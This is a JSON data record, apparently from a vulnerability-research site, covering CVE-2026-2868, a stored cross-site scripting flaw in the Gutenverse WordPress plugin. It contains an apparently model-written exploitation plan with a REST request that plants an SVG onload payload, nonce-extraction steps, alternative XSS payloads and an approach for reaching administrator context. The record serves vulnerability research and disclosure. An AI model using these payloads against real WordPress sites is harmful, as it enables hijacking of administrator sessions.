[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCjK5Mf-NUry3dt7siIuE5_PeE3rnuyDGADEmzZmavFA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-2868","gutenverse-ultimate-wordpress-fse-blocks-addons-ecosystem-authenticated-contributor-stored-cross-site-scripting-via-sepa","Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem \u003C= 3.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'separatorIconSVG'","The Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'separatorIconSVG' parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","gutenverse",null,"\u003C=3.5.3","3.6.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:22:31","2026-05-05 02:26:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcc540e5c-180f-4743-b1fb-608aa0e3ae79?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fblocks.css","assets\u002Fcss\u002Ffrontend\u002Fgallery.css","assets\u002Fjs\u002Fblocks.js","assets\u002Fjs\u002Ffrontend\u002Fchart.js","assets\u002Fjs\u002Ffrontend\u002Fchunk-swiper-modules.js","assets\u002Fjs\u002Ffrontend\u002Fchunk-swiper.js","assets\u002Fjs\u002Ffrontend\u002Fgallery.js","assets\u002Fjs\u002Ffrontend\u002Fpostblock.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-2868\n\n## 1. Vulnerability Summary\n**CVE-2026-2868** is a Stored Cross-Site Scripting (XSS) vulnerability in the **Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem** plugin (versions \u003C= 3.5.3). The vulnerability exists because the plugin fails to sanitize or escape the `separatorIconSVG` attribute used in its Gutenberg blocks. Authenticated users with **Contributor-level** permissions or higher can inject malicious scripts into this attribute. When the block is rendered on the frontend or within the editor, the script executes in the context of the viewing user (e.g., an Administrator).\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress REST API for posts\u002Fpages (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` or `\u002Fwp-json\u002Fwp\u002Fv2\u002Fpages`).\n- **Vulnerable Parameter**: `separatorIconSVG` (within the block attributes JSON in `post_content`).\n- **Authentication**: Required (Contributor-level or higher).\n- **Preconditions**: The plugin must be active. The attacker needs to be able to create or edit a post\u002Fpage.\n\n## 3. Code Flow\n1. **Input**: A Contributor user saves a post containing a Gutenverse block (likely `gutenverse\u002Fsection` or `gutenverse\u002Fcolumn`) where the `separatorIconSVG` attribute is populated with a malicious SVG\u002FHTML string.\n2. **Persistence**: The block attributes are stored as JSON comments in the `post_content` field within the `wp_posts` table (e.g., `\u003C!-- wp:gutenverse\u002Fsection {\"separatorIconSVG\":\"\u003Csvg\u002Fonload=alert(1)>\"} -->`).\n3. **Processing**: When a user views the post, WordPress parses the blocks.\n4. **Sink**: The Gutenverse plugin's PHP rendering logic (likely a `render_callback` for dynamic blocks or the saved static HTML) retrieves the `separatorIconSVG` attribute and echoes it directly into the page output without using `wp_kses()` or `esc_html()`.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this via the REST API as a Contributor:\n1. **Login**: Authenticate as the Contributor user.\n2. **Access Editor**: Navigate to `wp-admin\u002Fpost-new.php`.\n3. **Extract REST Nonce**: Use `browser_eval` to extract the `wp_rest` nonce from the global `wpApiSettings` object.\n   - **Command**: `browser_eval(\"window.wpApiSettings.nonce\")`\n4. **Alternative (Frontend)**: If the plugin localizes data for the frontend, it might be in `window.gutenverseCoreFrontend?.nonce` or similar, but for saving posts, the standard WordPress `wp_rest` nonce is the primary target.\n\n## 5. Exploitation Strategy\n### Step 1: Authentication and Nonce Retrieval\nUse the `browser_navigate` and `browser_eval` tools to log in as a Contributor and grab the REST API nonce.\n\n### Step 2: Identify Target Block\nBased on the attribute name, the most likely block is `gutenverse\u002Fsection`.\nThe block markup should look like this:\n```html\n\u003C!-- wp:gutenverse\u002Fsection {\"elementId\":\"guten-poc-1\",\"separatorIconSVG\":\"\u003Csvg\u002Fonload=alert(document.domain)>\"} -->\n\u003Cdiv class=\"guten-element guten-section guten-poc-1\">\n    \u003Cdiv class=\"guten-shape-divider guten-shape-divider-top\">\u003C\u002Fdiv>\n\u003C\u002Fdiv>\n\u003C!-- \u002Fwp:gutenverse\u002Fsection -->\n```\n\n### Step 3: Inject Payload via REST API\nSend a `POST` request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` to create a new post with the malicious content.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n- **Method**: `POST`\n- **Headers**:\n    - `Content-Type: application\u002Fjson`\n    - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Body**:\n```json\n{\n    \"title\": \"XSS Test\",\n    \"content\": \"\u003C!-- wp:gutenverse\u002Fsection {\\\"elementId\\\":\\\"xss-id\\\",\\\"separatorIconSVG\\\":\\\"\u003Csvg\u002Fonload=alert(1)>\\\"} -->\u003Cdiv class=\\\"guten-element guten-section xss-id\\\">\u003C\u002Fdiv>\u003C!-- \u002Fwp:gutenverse\u002Fsection -->\",\n    \"status\": \"publish\"\n}\n```\n*Note: Contributors cannot usually \"publish\" directly if they lack the `publish_posts` capability, so use `\"status\": \"pending\"` or `\"draft\"` if `publish` fails.*\n\n### Step 4: Trigger XSS\nNavigate to the newly created post's URL. If the post is in \"pending\" or \"draft\" status, view it via the preview link or log in as an Admin to view it.\n\n## 6. Test Data Setup\n1. **Role**: Create a user with the `contributor` role.\n2. **Plugin**: Ensure `gutenverse` version 3.5.3 is installed and active.\n3. **Page Creation**: No specific pre-existing pages are required, as the attacker creates the content.\n\n## 7. Expected Results\n- The REST API should return a `201 Created` or `200 OK` response.\n- When viewing the post on the frontend, the browser should execute `alert(1)`.\n- The HTML source of the rendered page should contain the raw `\u003Csvg\u002Fonload=alert(1)>` string inside a container related to Gutenverse separators.\n\n## 8. Verification Steps\n1. **Database Check**: Use `wp-cli` to verify the payload is stored:\n   `wp post list --post_type=post --field=post_content | grep \"separatorIconSVG\"`\n2. **Frontend Check**: Use `http_request` to fetch the post content and verify the payload isn't escaped:\n   `http_request(url=\"[POST_URL]\")` -> Verify response body contains `\u003Csvg\u002Fonload=alert(1)>`.\n\n## 9. Alternative Approaches\n- **Payload Variance**: If `\u003Csvg\u002Fonload...>` is filtered, try:\n    - `\">\u003Cimg src=x onerror=alert(1)>`\n    - `\u003Ciframe src=\"javascript:alert(1)\">`\n    - Base64 encoding the SVG: `data:image\u002Fsvg+xml;base64,...` (if the plugin handles URLs\u002FData URIs poorly).\n- **Editor XSS**: Open the draft as an Administrator. The Gutenberg editor itself may render the attribute, leading to an **Admin-context XSS** without needing to visit the frontend.\n- **Different Blocks**: If `gutenverse\u002Fsection` doesn't work, try `gutenverse\u002Fcolumn` or `gutenverse\u002Fdivider` using the same attribute name.","gemini-3-flash-preview","2026-05-04 16:47:40","2026-05-04 16:48:05",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.5.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgutenverse\u002Ftags\u002F3.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgutenverse.3.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgutenverse\u002Ftags\u002F3.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgutenverse.3.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgutenverse\u002Ftags"]